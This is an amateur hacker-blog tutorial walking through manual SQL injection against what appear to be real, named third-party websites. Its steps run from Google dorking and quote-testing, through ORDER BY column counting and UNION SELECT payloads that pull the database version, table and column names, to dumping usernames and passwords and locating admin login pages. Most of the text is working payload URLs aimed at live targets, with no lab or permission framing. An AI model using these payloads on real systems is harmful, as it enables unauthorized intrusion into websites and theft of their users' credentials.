Guran

(¯`·._.·ha3ker-site·._.·´¯)

Hello Friends! Welcome on elite cyber security.2day i am going to show you how to make a sql injection.. 1. find vulner able website: use Google.com and use sql dorks : pick a target: I.e: http://www.futuresfins.com/fin-detail.php?id=173 2. check its sql vulnerable or not jus Add ' in the end and hit enter. I.E: http://www.futuresfins.com/fin-detail.php?id=173' syntax error....Good its vulnerable....Now lets start: 3.Get Number of colums: Add order by 1,2,5 .8-- .etc I.e: http://www.futuresfins.com/fin-detail.php?id=173 order by 5-- (no error)page opend. http://www.futuresfins.com/fin-detail.php?id=173 order by 12-- (error) http://www.futuresfins.com/fin-detail.php?id=173 order by 11-- (no error) it means there are 11 colums in this website... 4.union of all columns.. it will show you vulnerable columns that you can use... http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,2,3,4,5,6,7,8,9,10,11-- other: http://www.cti-pfan.net/privacy.php?id=-9 union select all 1,2,3,4,5,6,7,8-- Note: always Add - befor id number i.e:php?id=-173 as you can see here is 2 show on secreen...it mean 2 colum is vulnerable... 5.check version : replace 2 with: @@version I.e: http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,@@version,3,4,5,6,7,8,9,10,11-- Hmmm its above 5... 6. check Data base name: just replace @@version with concat(database()) I.e: http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,concat(database()),3,4,5,6,7,8,9,10,11-- here is Data base name: Future_future2 save it... 7.Now get table name: Replace concat(database()) with: group_concat(table_name) and in the end add this after colums: from information_schema.tables where table_schema=database()-- i.e: http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()-- it show all tables name...Our Table Is There "users" 8.Here users table here...Go to this website: http://www.swingnote.com/tools/texttohex.php and enter here users and copy the HEX code: 7573657273 9.Find column name: http://www.cti-pfan.net/privacy.php?id=-9 union select all 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()-- replace table_name with (column_name) and add information_schema.columns 10.Now get usersname and password: i.e: http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,group_concat(Username,0x3a,Password),3,4,5,6,7,8,9,10,11 from users-- Bingoooooooo...you Got user name and pass: 10:Find admin panel.. some common login pages... http://www.futuresfins.com/login.html http://www.futuresfins.com/admin.html Enjoy........